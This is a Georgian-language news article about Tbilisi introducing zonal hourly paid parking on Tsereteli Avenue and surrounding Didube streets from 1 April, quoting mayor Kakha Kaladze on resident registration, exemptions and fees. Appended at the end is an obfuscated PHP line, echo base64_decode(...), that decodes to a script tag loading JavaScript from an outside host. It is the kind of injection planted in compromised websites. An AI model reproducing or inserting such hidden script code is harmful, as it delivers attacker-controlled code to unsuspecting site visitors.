celsiusi
ავერსი საქკაბელი

 პირველი აპრილიდან აკაკი წერეთლის გამზირსა და მიმდებარე ქუჩებზე ზონალურ-საათობრივი პარკირების სისტემა ამოქმედდება.

როგორც თბილისის მერმა, კახა კალაძემ დღეს დედაქალაქის მთავრობის სხდომაზე განაცხადა, ადგილობრივი მცხოვრებლები ზონალურ-საათობრივი პარკირების არეალებში უფასო პარკირებისთვის რეგისტრაციის გავლას და სხვა საჭირო ინფორმაციის მიღებას პირველი მარტიდან მუნიციპალურ პავილიონებში შეძლებენ.

„განვათავსებთ ჯიხურებს, სადაც ჩვენი კვალიფიციური, გადამზადებული თანამშრომლები დაგეხმარებიან საკუთარი ავტომობილების რეგისტრაციაში. ჯიხურები დროებით განთავსდება წერეთლის გამზირის N118-ში, N116-ში, N76-ში, N48-ში, ასევე N12ა-ს მიმდებარედ, წყალტუბოს ქუჩის N10-ში და ტრანსპორტის ქუჩის მიმდებარედ. ერთთვიანი ვადა აქვს ადგილობრივ მოსახლეობას იმისთვის, რომ დარეგისტრირდეს. პირველი აპრილიდან კი აღნიშნულ ქუჩებზე, როგორც მოგახსენეთ, ამოქმედდება ზონალურ-საათობრივი პარკირება“, – განაცხადა კახა კალაძემ.

ამასთან, დედაქალაქის მერმა ზონალურ-საათობრივი პარკირების წესები კიდევ ერთხელ განმარტა.

„სატრანსპორტო პოლიტიკის მიმართულებით, რომელიც ბევრი კომპონენტისგან შედგება, უმნიშვნელოვანეს რეფორმას ვახორციელებთ. ერთ-ერთია ზონალურ-საათობრივი პარკირება, რომლის ამოქმედებაც ქალაქის სხვადასხვა რაიონში, უბანსა და ქუჩაზე ეტაპობრივად იგეგმება. ზონალურ-საათობრივი პარკირების არეალებში პარკირება უფასოა წინასწარ რეგისტრირებული ადგილობრივი მცხოვრებლებისთვის, რაც იმას ნიშნავს, რომ ადგილობრივებმა აუცილებლად უნდა დაარეგისტრირონ თავიანთ საკუთრებაში არსებული ავტომობილები, რადგან ხშირია შემთხვევა, რომ ადამიანებს არ აქვთ შესაძლებლობა, საკუთარ საცხოვრებელთან მანქანა გააჩერონ. ასევე, უნდა აღინიშნოს, რომ ზონალურ-საათობრივი პარკირება უფასოა შშმ პირებისთვის, ელექტროავტომობილის მფლობელებისა და „A” კატეგორიის ტაქსებისთვის. სხვა შემთხვევაში ტარიფის ღირებულება უცვლელია და შეადგენს 1 საათი 1 ლარს. ასევე, შეგახსენებთ, რომ მოქალაქეს შეუძლია, დღე-ღამის განმავლობაში ოთხ სხვადასხვა ლოკაციაზე პირველი 15 წუთით ისარგებლოს უფასოდ“, – განაცხადა კახა კალაძემ.

წერეთლის გამზირის გარდა, დიდუბის რაიონში ზონალურ-საათობრივი პარკირება ამოქმედდება შემდეგ ქუჩებზე: ალიო მირცხულავას ქუჩა; წყალტუბოს ქუჩა; სამტრედიის ქუჩა; ბაქრაძის ქუჩა; ხოშარაულის ქუჩა; არჩილ კერესელიძის ქუჩა; რაჟდენ გვეტაძის ქუჩა; ქუთაისის ქუჩა; ფოთის ქუჩა; ბათუმის ქუჩა; შოთა იამანიძის ქუჩა; არჩილ ქურდიანის ქუჩა; სლავა მეტრეველის ქუჩა; ვლადიმერ მაიაკოვსკის ქუჩა; დავით ყიფიანის ქუჩა; თევდორე მღვდლის ქუჩა; თემურ ფიფიას ქუჩა; იროდიონ ევდოშვილის ქუჩა; სოხუმის ქუჩა; ზუგდიდის ქუჩა; ვახუშტი ბაგრატიონის ქუჩა; გორის ქუჩა; ბათუმის შესახვევი; გორის შესახვევი; ეგნატე და ვახტანგ ფიფიების ქუჩა; სპირიდონ კედიას ქუჩა; ვანის ქუჩა; სტანისლავსკის ქუჩა; თ. ერისთავის ქუჩა; ტრანსპორტის ქუჩა.

378
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");